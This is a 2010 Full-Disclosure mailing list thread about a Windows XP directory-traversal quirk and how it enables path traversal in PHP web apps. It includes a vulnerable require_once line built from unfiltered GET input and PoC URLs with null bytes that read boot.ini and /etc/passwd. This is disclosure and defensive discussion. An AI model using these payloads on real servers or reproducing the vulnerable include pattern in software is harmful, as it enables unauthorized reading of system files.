Re: Windows XP bug

[Christian Sciberras <uuf6429 () gmail com>]

Just a small note that platform bugs are a poor excuse to sloppy coding like
Juan mentioned.

Allowing unfiltered web user input for use in path names is always a bad
idea.

Filtering out path delimiters would already be a huge improvement.

Nice find by the way.

Regards,
Chris.

On Thu, Jul 8, 2010 at 1:37 PM, Juan Galiana <jgaliana () gmail com> wrote:

> This "feature" is useful to exploit path traversal in windows
> environments through web applications.
>
> In this case (I saw it plenty of times):
>
> <?php require_once("help/help_".$_GET['lang'] .".php"); ?>
>
>
> You can exploit it in windows with this PoC:
>
> http://server/file.php?a=/../../../../../../boot.ini%00
>
>
> because help/help_/../../../../../../boot.ini exists for windows and
> the non-existing help_ directory is not breaking the instruction.
>
>
> Otherwise, in linux is not possible to perform this kind of attacks
> due we can't reference non-existing directories
>
> $ ls -l noexist/../
> ls: cannot access noexist/../: No such file or directory
>
>
> An attack like http://server/file.php?a=/../../../../../../etc/passwd%00
> won't work
>
> Good approach!
>
> Best Regards,
>
> On Thu, Jul 8, 2010 at 10:13 AM, Vipul Agarwal <vipul () nuttygeeks com>
> wrote:
> > First, the bug seems to be useless but you deployed it cleverly in the
> > PoC. It could be something rare but makes web apps on Windows
> > vulnerable with some exceptions.
> >
> > Nice work!
> >
> > On Thu, Jul 8, 2010 at 1:08 PM, Sagar Belure <sagar.belure () gmail com>
> wrote:
> > > On Wed, Jul 7, 2010 at 10:54 AM, BlackHawk <hawkgotyou () gmail com>
> wrote:
> > > > Hi list, i recently discovered a very small Windows XP bug, kind of
> > > > useless alone but that could be usefull in some scenarios.
> > > >
> > > > Explanation:
> > > >
> > > > when you try to access a non existing directory though shell command
> > > > "cd", XP returns an error (obviously), but if you cd to a non-existing
> > > > & move one directory up, you'll not get any error.
> > > >
> > > > Example:
> > > > ---
> > > > C:\>cd ./somerandomchars <-- Will give an error
> > > > Impossibile trovare il percorso specificato.
> > > >
> > > > C:\>cd ./somerandomchars/../ <-- Everything is ok
> > > >
> > > > C:\>
> > > > ---
> > > >
> > > > PoC on how to make this thing usefull:
> http://www.scribd.com/doc/28080332/Podcast-Generator-1-3-Arbitrary-File-Download-Windows
> > > > Hope this could be useful for you in some way..
> > > >
> > > > --
> > > > BlackHawk - hawkgotyou () gmail com
> > > >
> > > > Sent with Gmail
> > > >
> > > > _______________________________________________
> > > > Full-Disclosure - We believe in it.
> > > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > > Hosted and sponsored by Secunia - http://secunia.com/
> > >
> > > Never seen this before.
> > > But, it's very obvious, as you are 'changing directory'(cd
> > > thisdoesntexist/) to a non existing folder and then getting out of
> > > it(../).
> > >
> > > But, there is difference with evaluation/calculation in windows and
> linux.
> > > Here is how...
> > >
> > > On Windows Box...
> > >
> > > C:\>cd thisdoesntexist/
> > > The system cannot find the path specified.
> > >
> > > C:\>cd thisdoesntexist/../
> > >
> > > C:\>cd thisdoesntexist/thisonetoo/../
> > > The system cannot find the path specified.
> > >
> > > C:\>cd thisdoesntexist/thisonetoo/../../
> > >
> > > C:\>
> > >
> > >
> > > On Linux box...
> > >
> > > one@ubuntubox:~$ cd thisdoesntexist/
> > > -bash: cd: thisdoesntexist: No such file or directory
> > > one@ubuntubox:~$ cd thisdoesntexist/../
> > > -bash: cd: thisdoesntexist/../: No such file or directory
> > > one@ubuntubox:~$
> > >
> > >
> > > --
> > > Thanks,
> > > Sagar Belure
> > > Security Analyst
> > > Secfence Technologies
> > > www.secfence.com
> > >
> > > _______________________________________________
> > > Full-Disclosure - We believe in it.
> > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > > Hosted and sponsored by Secunia - http://secunia.com/
> >
> >
> >
> > --
> > Thanks and Regards,
> > Vipul Agarwal
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/